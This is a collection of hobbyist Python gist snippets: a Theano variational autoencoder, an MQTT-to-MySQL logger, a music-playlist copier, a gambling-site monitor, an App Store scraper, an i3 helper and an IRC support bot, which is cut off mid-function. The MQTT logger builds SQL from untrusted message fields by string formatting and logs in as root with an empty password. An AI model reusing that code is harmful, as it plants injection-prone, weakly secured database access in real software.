import random
import numpy as np
from scipy.stats import norm
import time
import matplotlib.pyplot as plt
import matplotlib.cm as cm
import matplotlib.gridspec as gridspec
# From Theano tutorial - MNIST dataset
from logistic_sgd import load_data
import theano
import theano.tensor as T
start_time = time.time()
n_latent = 10
n_hidden = 500
n_input = 28*28
# Right now the code only works with one expectation (like the article), but this can be easily fixed
n_expectations = 1
batch_size = 100
n_epochs = 25000
random.seed(0)
np.random.seed(1)
# The functions below were adapted from the amazing Theano tutorial by Newmu
# https://github.com/Newmu/Theano-Tutorials
def floatX(X):
return np.asarray(X, dtype=theano.config.floatX)
def init_weights(shape):
return theano.shared(floatX(np.random.randn(*shape) * 0.01))
def sgd(cost, params, lr=0.05, momentum = 0.9):
grads = T.grad(cost=cost, wrt=params)
updates = []
for p, g in zip(params, grads):
acc = theano.shared(p.get_value() * 0.)
acc_new = acc*momentum + (1.0-momentum)*g
updates.append([acc, acc_new])
updates.append([p, p - acc_new * lr])
return updates
def adagrad(cost, params, lr=0.001, epsilon=1e-6):
grads = T.grad(cost=cost, wrt=params)
updates = []
for p, g in zip(params, grads):
acc = theano.shared(p.get_value() * 0.)
acc_new = acc + g ** 2
gradient_scaling = T.sqrt(acc_new + epsilon)
g = g / gradient_scaling
updates.append((acc, acc_new))
updates.append((p, p - lr * g))
return updates
def RMSprop(cost, params, lr=0.001, rho=0.9, epsilon=1e-6):
grads = T.grad(cost=cost, wrt=params)
updates = []
for p, g in zip(params, grads):
acc = theano.shared(p.get_value() * 0.)
acc_new = rho * acc + (1 - rho) * g ** 2
gradient_scaling = T.sqrt(acc_new + epsilon)
g = g / gradient_scaling
updates.append((acc, acc_new))
updates.append((p, p - lr * g))
return updates
# Parameters
# Gaussian MLP weights and biases (encoder)
gaussian_bh = init_weights((n_hidden, ))
mu_bo = init_weights((n_latent, ))
sigma_bo = init_weights((n_latent, ))
gaussian_Wh = init_weights((n_input, n_hidden))
mu_Wo = init_weights((n_hidden, n_latent))
sigma_Wo = init_weights((n_hidden, n_latent))
# Bernoulli MLP weights and biases (decoder)
bernoulli_bh = init_weights((n_hidden, ))
bernoulli_bo = init_weights((n_input, ))
bernoulli_Wh = init_weights((n_latent, n_hidden))
bernoulli_Wo = init_weights((n_hidden, n_input))
# Only the weight matrices W will be regularized (weight decay)
W = [gaussian_Wh, mu_Wo, sigma_Wo, bernoulli_Wh, bernoulli_Wo]
b = [gaussian_bh, mu_bo, sigma_bo, bernoulli_bh, bernoulli_bo]
params = W + b
# Gaussian Encoder
x = T.matrix("x")
h_encoder = T.tanh(T.dot(x, gaussian_Wh) + gaussian_bh)
mu = T.dot(h_encoder, mu_Wo) + mu_bo
log_sigma = 0.5*(T.dot(h_encoder, sigma_Wo) + sigma_bo)
# This expression is simple (not an expectation) because we're using normal priors and posteriors
DKL = (1.0 + 2.0*log_sigma - mu**2 - T.exp(2.0*log_sigma)).sum(axis = 1)/2.0
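# (Hedged clarification added here, not part of the original gist: with a diagonal
# Gaussian posterior q(z|x) = N(mu, sigma^2) and a standard normal prior p(z) = N(0, I),
# the KL divergence has the closed form
#   KL(q || p) = 0.5 * sum_j (mu_j^2 + sigma_j^2 - 1 - log sigma_j^2).
# The line above computes the negative of that KL, written with log_sigma = 0.5*log(sigma^2),
# which is the sign with which it enters the variational lower bound.)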
# Bernoulli Decoder
std_normal = T.matrix("std_normal")
z = mu + T.exp(log_sigma)*std_normal
h_decoder = T.tanh(T.dot(z, bernoulli_Wh) + bernoulli_bh)
y = T.nnet.sigmoid(T.dot(h_decoder, bernoulli_Wo) + bernoulli_bo)
log_likelihood = -T.nnet.binary_crossentropy(y, x).sum(axis = 1)
# Lower bound
lower_bound = -(DKL + log_likelihood).mean()
# Weight decay
L2 = sum([(w**2).sum() for w in W])
cost = lower_bound + batch_size/50000.0/2.0*L2
#updates = sgd(lower_bound, params, lr = 0.001)
updates = RMSprop(cost, params, lr=0.001)
#updates = adagrad(lower_bound, params, lr=0.02)
train_model = theano.function(inputs=[x, std_normal],
outputs=cost,
updates=updates,
mode='FAST_RUN',
allow_input_downcast=True)
eval_model = theano.function(inputs=[x, std_normal], outputs=lower_bound,
mode='FAST_RUN',
allow_input_downcast=True)
print("--- %s seconds ---" % (time.time() - start_time))
start_time = time.time()
# Load MNIST and binarize it
datasets = load_data('mnist.pkl.gz')
train_x, _ = datasets[0]
train_x = 1.0*(train_x > 0.5)
val_x, _ = datasets[1]
val_x = 1.0*(val_x > 0.5)
tx = theano.function([], T.concatenate([train_x, val_x]))()
# Using the test set as validation
tst_x, _ = datasets[2]
tst_x = 1.0*(tst_x > 0.5)
vx = theano.function([], tst_x)()
print("--- %s seconds ---" % (time.time() - start_time))
start_time = time.time()
training = []
validation = []
for i in range(n_epochs):
minibatch_train = [ tx[j] for j in random.sample(xrange(len(tx)), batch_size) ]
val_cost = eval_model(vx, np.random.normal(size = (len(vx), n_latent)))
train_cost = train_model(minibatch_train, np.random.normal(size = (batch_size, n_latent)))
print "epoch", i, "train", train_cost, "val", val_cost
training.append(train_cost)
validation.append(val_cost)
plt.subplot(211)
plt.ylabel("-Lower bound")
plt.xlabel("Minibatch (" + str(batch_size) + " samples)")
plt.plot(training, label = "Train")
plt.legend()
plt.subplot(212)
plt.ylabel("-Lower bound")
plt.xlabel("Minibatch (" + str(batch_size) + " samples)")
plt.plot(validation, 'r', label = "Validation")
plt.legend()
plt.show()
print("--- %s seconds ---" % (time.time() - start_time))
start_time = time.time()
# Now let's test the auto-encoder on some visual problems
# "Deterministic" decoder (uses only the mean of the Gaussian encoder)
t = T.vector()
h_mu = T.tanh(T.dot(t, gaussian_Wh) + gaussian_bh)
h_bern = T.tanh(T.dot(T.dot(h_mu, mu_Wo) + mu_bo, bernoulli_Wh) + bernoulli_bh)
yt = T.nnet.sigmoid(T.dot(h_bern, bernoulli_Wo) + bernoulli_bo)
test_input = theano.function([t], yt,
mode='FAST_RUN',
allow_input_downcast=True)
# Reconstruct some random images (with optional salt and pepper noise)
salt_pepper = 0.2
plt.figure()#figsize = (5, 2))
gs1 = gridspec.GridSpec(5, 2)
gs1.update(wspace=0.0, hspace=0.0) # set the spacing between axes.
for i in range(5):
test = vx[random.randint(0, len(vx))]
test = np.array([test[j] if u > salt_pepper else np.random.choice([0, 1]) for u, j in zip(np.random.uniform(size = n_input), range(n_input))])
plt.subplot(gs1[2*i])
plt.axis('off')
plt.imshow(test.reshape((28, 28)), cmap = cm.Greys_r)
plt.subplot(gs1[2*i + 1])
plt.axis('off')
plt.imshow(test_input(test).reshape((28, 28)), cmap = cm.Greys_r)
plt.show()
# Now let's visualize the learned manifold
# We only need the decoder for this (and some way to generate latent variables)
t = T.vector()
h = T.tanh(T.dot(t, bernoulli_Wh) + bernoulli_bh)
yt = T.nnet.sigmoid(T.dot(h, bernoulli_Wo) + bernoulli_bo)
visualize = theano.function([t], yt,
mode='FAST_RUN',
allow_input_downcast=True)
# Size of visualizations
size = 10
# For 2 latent variables the manifold can be fully explored on a grid
plt.figure(figsize = (size, size))
gs1 = gridspec.GridSpec(size, size)
gs1.update(wspace=0.0, hspace=0.0) # set the spacing between axes.
ppf = np.linspace(1E-3, 1.0 - 1E-3, size)
if n_latent == 2:
for i in range(size):
for j in range(size):
plt.subplot(gs1[size*i + j])
plt.axis('off')
image = 1.0 - visualize([norm.ppf(ppf[i]), norm.ppf(ppf[j])])
plt.imshow(image.reshape((28, 28)), cmap = cm.Greys_r)
plt.show()
# For any number of latent variables you can sample them and generate fake data
plt.figure(figsize = (size, size))
gs1 = gridspec.GridSpec(size, size)
gs1.update(wspace=0.0, hspace=0.0) # set the spacing between axes.
for i in range(size):
for j in range(size):
plt.subplot(gs1[size*i + j])
plt.axis('off')
image = 1.0 - visualize(np.random.normal(0, 1.0, size = n_latent))
plt.imshow(image.reshape((28, 28)), cmap = cm.Greys_r)
plt.show()
print("--- %s seconds ---" % (time.time() - start_time))
```
#### File: hard-gists/6532185/snippet.py
```python
import MySQLdb
import mosquitto
import json
import time
#mosquitto broker config
broker = 'mqtt.localdomain'
broker_port = 1883
broker_topic = '/test/location/#'
#broker_clientid = 'mqttuide2mysqlScript'
#mysql config
mysql_server = 'thebeast.localdomain'
mysql_username = 'root'
mysql_passwd = ''
mysql_db = 'mqtt'
#change table below.
# Open database connection
db = MySQLdb.connect(mysql_server, mysql_username, mysql_passwd, mysql_db)
# prepare a cursor object using cursor() method
cursor = db.cursor()
def on_connect(mosq, obj, rc):
print("rc: "+str(rc))
def on_message(mosq, obj, msg):
print(msg.topic+" "+str(msg.qos)+" "+str(msg.payload))
vars_to_sql = []
keys_to_sql = []
list = []
list = json.loads(msg.payload)
for key,value in list.iteritems():
print ("")
print key, value
if key == 'tst':
print "time found"
print value
value = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(float(value)))
print value
value_type = type(value)
if value_type is not dict:
print "value_type is not dict"
if value_type is unicode:
print "value_type is unicode"
vars_to_sql.append(value.encode('ascii', 'ignore'))
keys_to_sql.append(key.encode('ascii', 'ignore'))
else:
print "value_type is not unicode"
vars_to_sql.append(value)
keys_to_sql.append(key)
#add the msg.topic to the list as well
print "topic", msg.topic
addtopic = 'topic'
vars_to_sql.append(msg.topic.encode('ascii', 'ignore'))
keys_to_sql.append(addtopic.encode('ascii', 'ignore'))
keys_to_sql = ', '.join(keys_to_sql)
try:
# Execute the SQL command
# change locations to the table you are using
queryText = "INSERT INTO locations(%s) VALUES %r"
queryArgs = (keys_to_sql, tuple(vars_to_sql))
cursor.execute(queryText % queryArgs)
print('Successfully Added record to mysql')
db.commit()
except MySQLdb.Error, e:
try:
print "MySQL Error [%d]: %s" % (e.args[0], e.args[1])
except IndexError:
print "MySQL Error: %s" % str(e)
# Rollback in case there is any error
db.rollback()
print('ERROR adding record to MYSQL')
def on_publish(mosq, obj, mid):
print("mid: "+str(mid))
def on_subscribe(mosq, obj, mid, granted_qos):
print("Subscribed: "+str(mid)+" "+str(granted_qos))
def on_log(mosq, obj, level, string):
print(string)
# If you want to use a specific client id, use
#mqttc = mosquitto.Mosquitto(broker_clientid)
# but note that the client id must be unique on the broker. Leaving the client
# id parameter empty will generate a random id for you.
mqttc = mosquitto.Mosquitto()
mqttc.on_message = on_message
mqttc.on_connect = on_connect
mqttc.on_publish = on_publish
mqttc.on_subscribe = on_subscribe
# Uncomment to enable debug messages
mqttc.on_log = on_log
mqttc.connect(broker, broker_port, 60)
mqttc.subscribe(broker_topic, 0)
rc = 0
while rc == 0:
rc = mqttc.loop()
print("rc: "+str(rc))
# disconnect from server
print ('Disconnected, done.')
db.close()
```
#### File: hard-gists/6572592/snippet.py
```python
import urllib, urllib2
import gmusicapi
from xml.etree.ElementTree import *
def main():
# Gather required info.
google_username = raw_input("Google username: ").strip()
google_password = raw_input("Google password: ")
lastfm_username = raw_input("Lastfm username: ").strip()
lastfm_key = raw_input("Lastfm API key: ").strip()
# Log in.
api = gmusicapi.Mobileclient()
if not api.login(google_username, google_password, gmusicapi.Mobileclient.FROM_MAC_ADDRESS):
print "Login error"
return
# Get loved tracks.
loved = []
page = 1
while True:
url = "http://ws.audioscrobbler.com/2.0/?method=user.getlovedtracks&user=%s&api_key=%s&page=%d" % \
(lastfm_username, lastfm_key, page)
print("Fetching: " + url)
tree = parse(urllib2.urlopen(url)).getroot()
tracks = tree.findall('lovedtracks/track')
for track in tracks:
title = track.find('name').text
artist = track.find('artist/name').text
loved.append((artist,title))
if len(tracks) < 50:
break
page += 1
print("Got " + str(len(loved)) + " loved tracks")
if len(loved) == 0:
print "Exiting"
return
# Creating new playlist
playlist_id = api.create_playlist("Loved tracks")
to_add = []
# Search for each song in all access.
# This is quite a dirty way to do it, and the gmusicapi seems to be a little out of date
# hence the catch-all. This found 529 out of the 787 loved songs I have which is not too bad.
for target in loved:
try:
res = api.search_all_access(target[0] + " " + target[1], max_results=1)
to_add.append(res["song_hits"][0]["track"]["nid"])
except:
pass
print("Got " + str(len(to_add)) + " songs so far out of " + str(len(loved)))
print("Adding " + str(len(to_add)) + " songs to playlist")
api.add_songs_to_playlist(playlist_id, to_add)
print("Done! I hope.")
if __name__ == '__main__':
main()
```
#### File: hard-gists/6581415/snippet.py
```python
import datetime
import json
import gtk
import gobject
# TODO: fix gi.repository.WebKit to have a working webview.get_dom_document
import webkit
# This is a module providing direct python bindings into JavaScriptCore.
# http://packages.linuxdeepin.com/deepin/pool/main/p/python-javascriptcore/python-javascriptcore_0.0003-deepin1_amd64.deb
import javascriptcore
# This is another JavaScriptCore library. It doesn't support python callbacks.
# import jswebkit as javascriptcore
import pymongo
class WebView(webkit.WebView):
"""
Manage the actual webpage and the interface to the webpage here.
"""
__gsignals__ = {
"started": (gobject.SIGNAL_RUN_FIRST,
gobject.TYPE_NONE,
(gobject.TYPE_OBJECT,),
)
}
def __init__(self, browser):
super(WebView, self).__init__()
# keep a reference to the parent object
self._browser = browser
self.results = []
self.resultcounter = 0
self.last_balance = 0
self.last_invested = 0
self.settings = self.get_settings()
self.settings.set_property("enable-java-applet", False)
self.settings.set_property("enable-plugins", False)
self.settings.set_property("enable-scripts", True)
self.settings.set_property("enable-file-access-from-file-uris", True)
self.settings.set_property("enable-private-browsing", False)
self.settings.set_property("enable-spell-checking", False)
self.settings.set_property("enable-universal-access-from-file-uris", True)
self.settings.set_property("enable-dns-prefetching", True)
self.settings.set_property("enable-webaudio", True)
self.settings.set_property("enable-webgl", True)
self.settings.set_property("enable-fullscreen", True)
self.settings.set_property("enable-xss-auditor", False)
self.settings.set_property("javascript-can-open-windows-automatically", False)
self.settings.set_property("user-agent", Browser.user_agent)
#self.set_full_content_zoom(True)
self.set_border_width(0)
self.set_custom_encoding('UTF-8')
self.set_double_buffered(True)
self.set_transparent(True)
self.set_editable(False)
#self.set_view_mode(False)
self.set_view_source_mode(False)
self.console_response = self.connect('console-message', self.on_console_message)
self.connect('notify::load-status', self._on_load_status)
# HACK to get JSGlobalContextRef
#self.connect("window-object-cleared", self.on_window_object_cleared)
#self.connect('load-finished', self.on_load_finished)
self.connect("document-load-finished", self.on_load_finished)
def _on_load_status(self, view, browser):
if view.get_property('load-status') == webkit.LOAD_FINISHED:
print ('* Browser load finished')
# This needs to run with a timeout because otherwise the
# status is emited before the offscreen image is finished.
# GObject.timeout_add(100, lambda: self.emit("render-finished"))
elif view.get_property('load-status') == webkit.LOAD_FAILED:
print ('* Browser load failed')
elif view.get_property('load-status') == webkit.LOAD_COMMITTED:
print ('* Browser load commited')
elif view.get_property('load-status') == webkit.LOAD_PROVISIONAL:
print ('* Browser load provisional')
elif view.get_property('load-status') == webkit.LOAD_FIRST_VISUALLY_NON_EMPTY_LAYOUT:
print ('* Browser load provisional')
def on_load_finished(self, browser, web_frame):
print ('=> event load finished ') #, browser, web_frame
        print ('Provisional data source:', web_frame.get_provisional_data_source())
print ('Title:', web_frame.get_title())
print ('URI:', web_frame.get_uri())
# add a chat message to the message box (does not send network packets)
# js.globalObject.socket.listeners("chat").values()[0]("hi world", "500")
# js.globalObject.socket.emit("chat", js.globalObject.csrf, "hello cruel world")
self.setup_js()
print "on_load_finished returning early for testing purposes"
return
# let's setup the callbacks
self.element_bankroll = self.js.globalObject.document.getElementsByClassName("bankroll").values()[0]
def on_updated_bankroll(whatever):
self.invested = self.element_bankroll.innerText
#print "invested: " + str(self.invested)
self.element_bankroll.addEventListener("DOMSubtreeModified", on_updated_bankroll)
self.element_investment_profit = self.js.globalObject.document.getElementsByClassName("sprofitpct").values()[0]
def on_updated_investment_profit(whatever):
self.investment_profit = self.element_investment_profit.innerText
#print "investment profit: " + str(self.investment_profit)
self.element_investment_profit.addEventListener("DOMSubtreeModified", on_updated_investment_profit)
def on_updated_investment(whatever):
self.invested = float(self.element_invested.innerText)
self.element_invested = self.js.globalObject.document.getElementsByClassName("investment").values()[0]
self.element_invested.addEventListener("DOMSubtreeModified", on_updated_investment)
def on_updated_balance(whatever):
self.balance = float(self.element_balance.value)
self.element_balance = self.js.globalObject.document.getElementById("pct_balance")
self.element_balance.addEventListener("DOMSubtreeModified", on_updated_balance)
def on_result(data):
"""
Bet result data.
"""
data = dict(data.items())
data["stats"] = dict(data["stats"].items())
self._browser.mongo_collection.insert(data)
if len(self.results) > 1000:
del self.results[0]
self.results.append(data)
self.resultcounter += 1
self.jscallbacks.on_result = on_result
self.js.evaluateScript("var on_result = function(data) { return jscallbacks.on_result(data); };")
self.js.evaluateScript("socket.on('result', on_result);")
#self.js.globalObject.socket.on("result", self.jscallbacks.on_result)
# remove the default listener for "timeout"
self.js.globalObject.socket.removeAllListeners("timeout")
def on_connection_timeout():
"""
The webpage eventually disconnects you.
"""
print "reconnecting at " + str(datetime.datetime.now())
self.js.evaluateScript("socket.emit('reconnect', csrf);")
self.jscallbacks.on_connection_timeout = on_connection_timeout
self.js.evaluateScript("var on_connection_timeout = function() { return jscallbacks.on_connection_timeout(); };")
self.js.evaluateScript("socket.on('timeout', on_connection_timeout);")
def on_console_message(self, *args):
(view, message, line, file) = args
print ('browser: ' + str(message) + ' in file: ' + str(file) + ' line:' + str(line))
self.stop_emission('console-message')
def invest(self):
print "investing: " + str(self.balance)
self.last_invested = self.balance
self.js.evaluateScript("socket.emit('invest', csrf, document.getElementById('pct_balance').value);")
def divest(self):
print "divesting: " + str(self.invested)
print "investment was: " + str(self.last_invested)
print "difference is: " + str(self.invested - self.last_invested)
self.element_invested = self.js.globalObject.document.getElementsByClassName("investment").values()[0]
self.js.evaluateScript("socket.emit('divest', csrf, document.getElementByClassName('investment')[0].innerText);")
@property
def profit(self):
return self.invested - self.last_invested
def login(self, username, password):
"""
Send a login signal to the site. This is problematic because it causes
the page to refresh. Why not just send the cookie the first time?
"""
self.js.globalObject.socket.emit("login", self.js.globalObject.csrf, username, password)
def setup_js(self):
"""
Setup the javascript bindings.
"""
context = self.get_main_frame().get_global_context()
# self._js = jswebkit.JSContext(context)
self._js = javascriptcore.JSContext(context)
self.document = self._js.evaluateScript("document")
# setup a JSObject to attach python callbacks to
self.jscallbacks = self._js.evaluateScript("var jscallbacks = {}; jscallbacks")
def example(text):
return text
self.jscallbacks.example = example
# js.evaluateScript("jscallbacks.example('500');")
return self._js
@property
def js(self):
if not hasattr(self, "_js"):
self.setup_js()
return self._js
class Browser(object):
"""
This is the main core of the application. Connects to just-dice.com and
starts monitoring all data events.
"""
default_width = 320
default_height = 240
user_agent = "NSA"
def __init__(self):
self.mongo_client = pymongo.MongoClient()
self.mongo_db = self.mongo_client.db_justdice
self.mongo_collection = self.mongo_db.collection_justdice
self.window = gtk.Window(type=gtk.WINDOW_TOPLEVEL)
self.window.set_position(gtk.WIN_POS_CENTER)
self.window.set_default_size(Browser.default_width, Browser.default_height)
self.window.connect("destroy", self.on_quit)
#self.vbox = Gtk.VBox()
self.webview = WebView(self)
self.scrolled_window = gtk.ScrolledWindow()
self.scrolled_window.add(self.webview)
self.window.add(self.scrolled_window)
self.window.show_all()
#self.webview.load_string(init_string, "text/html", "utf-8", "#")
#doc = self.webview.get_dom_document()
# open the main site
self.webview.open("https://just-dice.com/")
#self.webview.open("http://diyhpl.us/~bryan/debug.html")
def on_quit(self, widget):
gtk.main_quit()
if __name__ == "__main__":
browser = Browser()
from IPython.lib.inputhook import enable_gtk
enable_gtk()
# Main loop has been replaced by gtk.main() in __main__
#mainloop = GLib.MainLoop()
#mainloop.run()
#mainloop.quit()
#gtk.main()
```
#### File: hard-gists/6606487/snippet.py
```python
import pickle
from datetime import datetime
import urllib.request
from bs4 import BeautifulSoup
import re
import string
import json
import codecs
def loadState():
try:
state_file = open( "itunes_store_state_dump.pba", "rb" )
apps_discovered = pickle.load( state_file )
apps_pending = pickle.load( state_file )
state_file.close()
print( "Pending = ", len( apps_pending ), " Discovered = ", len( apps_discovered ) )
return apps_discovered, apps_pending
except IOError:
print( "A fresh start ..." )
return [], []
character_encoding = 'utf-8'
apps_discovered, apps_pending = loadState()
count_offset = len( apps_discovered )
apps_categories = {}
start_time = datetime.now()
def getPageAsSoup( url ):
try:
response = urllib.request.urlopen( url )
except urllib.error.HTTPError as e:
print( "HTTPError with: ", url, e )
return None
the_page = response.read()
soup = BeautifulSoup( the_page )
return soup
def reportProgress():
current_time = datetime.now()
elapsed = current_time - start_time
v = ( ( len( apps_discovered ) - count_offset ) / elapsed.seconds ) * 60
t = len( apps_pending ) / v if v > 0 else 0
print( "Pending = ", len( apps_pending ), " Discovered = ", len( apps_discovered ), " Velocity = ", str( v ), " parsed per min and Time remaining in min = ", str( t ) )
print( json.dumps( apps_categories ) )
def saveState():
state_file = open( "itunes_store_state_dump.pba", "wb" )
pickle.dump( apps_discovered, state_file )
pickle.dump( apps_pending, state_file )
state_file.close()
reportProgress()
def getApps( categoryUrl ):
previous_apps = []
start_idx = 1
while( True ):
url = categoryUrl + "&page=" + str( start_idx )
print( url )
categoryPage = getPageAsSoup( url )
allAppLinks = [aDiv.get( 'href' ) for aDiv in categoryPage.findAll( 'a', href = re.compile( '^https://itunes.apple.com/us/app' ) )]
if allAppLinks == previous_apps: break
apps_pending.extend( [appLink for appLink in allAppLinks if appLink not in apps_pending] )
previous_apps = allAppLinks
start_idx += 1
saveState()
def getAppDetails( appUrl ):
if appUrl in apps_discovered: return None
soup = getPageAsSoup( appUrl )
if not soup: return None
pTitleDiv = soup.find( 'p', {'class' : 'title'} )
if pTitleDiv and pTitleDiv.getText() == 'One Moment Please.': return None
appDetails = {}
appDetails['app_url'] = appUrl
titleDiv = soup.find( 'div', {'id' : 'title'} )
appDetails['title'] = titleDiv.find( 'h1' ).getText()
appDetails['developer'] = titleDiv.find( 'h2' ).getText()
detailsDiv = soup.find( 'div', {'id' : 'left-stack'} )
if not detailsDiv: return None
priceDiv = detailsDiv.find( 'div', {'class' : 'price'} )
if priceDiv: appDetails['price'] = priceDiv.getText()
categoryDiv = detailsDiv.find( 'li', {'class' : 'genre'} )
if categoryDiv: appDetails['category'] = categoryDiv.find( 'a' ).getText()
releaseDateDiv = detailsDiv.find( 'li', {'class' : 'release-date'} )
if releaseDateDiv: appDetails['release_date'] = releaseDateDiv.getText()
languageDiv = detailsDiv.find( 'li', {'class' : 'language'} )
if languageDiv: appDetails['language'] = languageDiv.getText().split()
contentRatingDiv = detailsDiv.find( 'div', {'class' : 'app-rating'} )
if contentRatingDiv: appDetails['content_rating'] = contentRatingDiv.getText()
contentRatingReasonDiv = detailsDiv.find( 'list app-rating-reasons' )
if contentRatingReasonDiv: appDetails['content_rating_reason'] = [li.getText() for li in contentRatingReasonDiv.findAll( 'li' )]
compatibilityDiv = detailsDiv.find( 'p' )
if compatibilityDiv: appDetails['compatibility'] = compatibilityDiv.getText()
customerRatingDivs = detailsDiv.findAll( 'div', {'class' : 'rating', 'role': 'img'} )
if customerRatingDivs:
customerRating = customerRatingDivs[-1].get( 'aria-label' ).split( ',' )
appDetails['rating'] = customerRating[0].strip()
appDetails['reviewers'] = customerRating[1].strip()
appLinksDiv = soup.find( 'div', {'class' : 'app-links'} )
if appLinksDiv:
for link in appLinksDiv.findAll( 'a', {'class' : 'see-all'} ):
text = link.getText()
href = link.get( 'href' )
if text.endswith( 'Web Site' ): appDetails['developer_wesite'] = href
elif text.endswith( 'Support' ): appDetails['support'] = href
elif text.endswith( 'Agreement' ): appDetails['license'] = href
apps_discovered.append( appUrl )
return appDetails
def closeFileHandlers( fileHandlers ):
for v in fileHandlers.values():
v.close()
if __name__ == '__main__':
itunesStoreUrl = 'https://itunes.apple.com/us/genre/ios/id36?mt=8'
mainPage = getPageAsSoup( itunesStoreUrl )
allCategories = []
for column in ['list column first', 'list column', 'list column last']:
columnDiv = mainPage.find( 'ul', {'class' : column} )
allCategories.extend( aDiv.get( 'href' ) for aDiv in columnDiv.findAll( 'a', href = re.compile( '^https://itunes.apple.com/us/genre' ) ) )
for category, alphabet in [( x, y ) for x in allCategories for y in string.ascii_uppercase]:
getApps( category + '&letter=' + alphabet )
fileHandlers = {}
count = 100
while apps_pending:
if count == 0:
saveState()
count = 100
count = count - 1
app = apps_pending.pop()
if not app: continue
try:
app_data = getAppDetails( app )
except Exception as e:
print( app, e )
exit( 1 )
if not app_data:
continue
if not app_data['category']: app_data['category'] = 'uncategorized'
if app_data['category'].lower() not in fileHandlers:
fileHandlers[app_data['category'].lower()] = codecs.open( '_'.join( ["apple_appstore", app_data['category'].lower()] ), 'ab', character_encoding, buffering = 0 )
apps_categories[app_data['category'].lower()] = 0
apps_categories[app_data['category'].lower()] = apps_categories[app_data['category'].lower()] + 1
fileHandler = fileHandlers[app_data['category'].lower()]
try:
fileHandler.write( json.dumps( app_data ) + "\n" )
except Exception as e:
print( e )
saveState()
closeFileHandlers( fileHandlers )
```
#### File: hard-gists/6623972/snippet.py
```python
import argparse
from subprocess import Popen
import i3
PARSER = argparse.ArgumentParser(prog='focus_win')
PARSER.add_argument('-n', '--number',
required=True,
type=int,
choices=[0, 1, 2, 3, 4, 5, 6, 7, 8, 9],
help='Window number (limited to [0,9]).')
def focus_nth_window(nth):
''' Roughly focus the nth window in the hierarchy (limited to 10 first) '''
wins = get_windows_from_current_workspace()
if nth == 0:
nth = 10
cmd = 'i3-msg [con_id={0}] focus'.format(wins[nth-1])
Popen(cmd, shell=True)
def get_windows_from_current_workspace():
res = []
ws = get_current_workspace()
workspace = i3.filter(name=ws)
if workspace:
workspace = workspace[0]
windows = i3.filter(workspace, nodes=[])
for window in windows:
res.append(window['id'])
return res
def get_current_workspace():
''' Returns the current workspace '''
workspaces = i3.msg('get_workspaces')
workspace = i3.filter(tree=workspaces, focused=True)
if workspace:
return workspace[0]['name']
return ''
if __name__ == '__main__':
args = PARSER.parse_args()
focus_nth_window(args.number)
```
#### File: hard-gists/6719172/snippet.py
```python
import willie.module
import re
import datetime
STATUS_OK = 0
STATUS_WAITING = 1
STATUS_IDLE = 2
available_supporters = {}
open_tickets = {}
closed_tickets = 0
next_ticket = 0
class config:
"""
A simple struct for providing the options of this module.
Contains default values as static attributes.
"""
channel = '#callcenter'
supporters = []
ticket_idle = 30 # ticket is idle after 30 seconds
ticket_timeout = 300 # ticket times out after 5 minutes
supporter_idle = 120 # supporter is idle after 2 minutes
supporter_timeout = 600 # supporter times out after 10 minutes
supporter_askifaliveinterval = 30 # asks idle supporters if they are still alive every 30 seconds
msg_no_supporter = 'We are sorry but there are no supporters online. We will notify you when someone is here!'
msg_invalid_ticket = 'Sorry, you have no valid support ticket. Please start a new direct support session!'
msg_idle_closed = "We closed your support ticket because you didn't say anything for a while."
msg_after_support = "We hope we were able to help you! :-)"
msg_supporter_available = "A supporter is now available!"
pass
class Ticket:
def __init__(self, nickname, language):
self.nickname = nickname
self.language = language
self.lasttime = datetime.datetime.now()
self.status = STATUS_OK
def touch(self):
"""
        Marks this ticket as active and resets its last-activity time
"""
self.lasttime = datetime.datetime.now()
self.status = STATUS_OK
def is_with(self, nickname):
return self.nickname.lower() == nickname.lower()
@staticmethod
def by_nick(nick):
global open_tickets
for k in open_tickets:
if open_tickets[k].is_with(nick):
return k
return None
def get_idletime(self):
"""
        Returns how many seconds this ticket has been idle.
"""
return (datetime.datetime.now() - self.lasttime).total_seconds()
class OnlineSupporter:
def __init__(self, nickname):
self.nickname = nickname
self.lasttime = datetime.datetime.now()
        self.lastaskalivetime = datetime.datetime.min  # far in the past, so the first ask-if-alive check is allowed
def touch(self):
self.lasttime = datetime.datetime.now()
def get_idletime(self):
return (datetime.datetime.now() - self.lasttime).total_seconds()
def may_askifalive(self):
return (datetime.datetime.now() - self.lastaskalivetime).total_seconds() >= config.supporter_askifaliveinterval;
def open_ticket(nick):
global next_ticket
ticket = next_ticket
open_tickets[ticket] = Ticket(nick[0], nick[1])
next_ticket += 1
return ticket;
def close_ticket(ticket, is_done=True):
if ticket in open_tickets:
open_tickets.pop(ticket)
if is_done:
global closed_tickets
closed_tickets += 1
return True
else:
return False
def get_nick_by_ticket(ticket):
if ticket in open_tickets:
return open_tickets[ticket].nickname
else:
return None
def get_ticket_stats():
return mirc_format("^B^K07%d^R tickets open (^B^K14+%d^R idle), ^B^K10%d^R tickets done" % (
sum(open_tickets[s].status == STATUS_OK for s in open_tickets),
sum(open_tickets[s].status == STATUS_IDLE for s in open_tickets),
closed_tickets))
@willie.module.event('PRIVMSG')
@willie.module.rule('.*')
def forward(bot, trigger):
if trigger.sender == trigger.nick:
        # It is a private query, because source == nickname instead of source == channel name
ticket = Ticket.by_nick(trigger.nick);
if ticket != None:
bot.msg(config.channel, mirc_format("^K4%s ^K4,15#%d^K^K4:^K %s" % (str(trigger.nick), ticket, trigger.bytes)))
open_tickets[ticket].touch()
else:
m = re.match(r"HELP:(.+);(.*)", trigger.bytes)
if (m):
                ticket = open_ticket((trigger.nick, m.group(1)))
bot.msg(config.channel, mirc_format("^K4New ticket: ^K4,15#%d^K^K4 (%s, %s)" % (ticket, trigger.nick, m.group(1))))
if len(available_supporters) == 0:
open_tickets[ticket].status = STATUS_WAITING;
bot.msg(trigger.nick, config.msg_no_supporter)
else:
bot.msg(trigger.nick, config.msg_invalid_ticket)
elif trigger.sender == config.channel and trigger.nick.lower() in config.supporters:
        # It is a message in the support channel. Cool!
        # Record a sign of life from the supporter
m = re.match(r"(\d+) (.*)$", trigger.bytes)
if m:
supporter_as_online(bot, trigger.nick)
target = get_nick_by_ticket(int(m.group(1)))
if target is not None:
bot.msg(target, m.group(2))
if available_supporters.has_key(trigger.nick.lower()):
if available_supporters[trigger.nick.lower()].get_idletime() > config.supporter_idle:
bot.write(('NOTICE', trigger.nick), "Hey %s, glad you're still here!" % trigger.nick)
bot.msg(config.channel, get_ticket_stats())
available_supporters[trigger.nick.lower()].touch()
@willie.module.commands('stats')
def show_stats(bot, trigger):
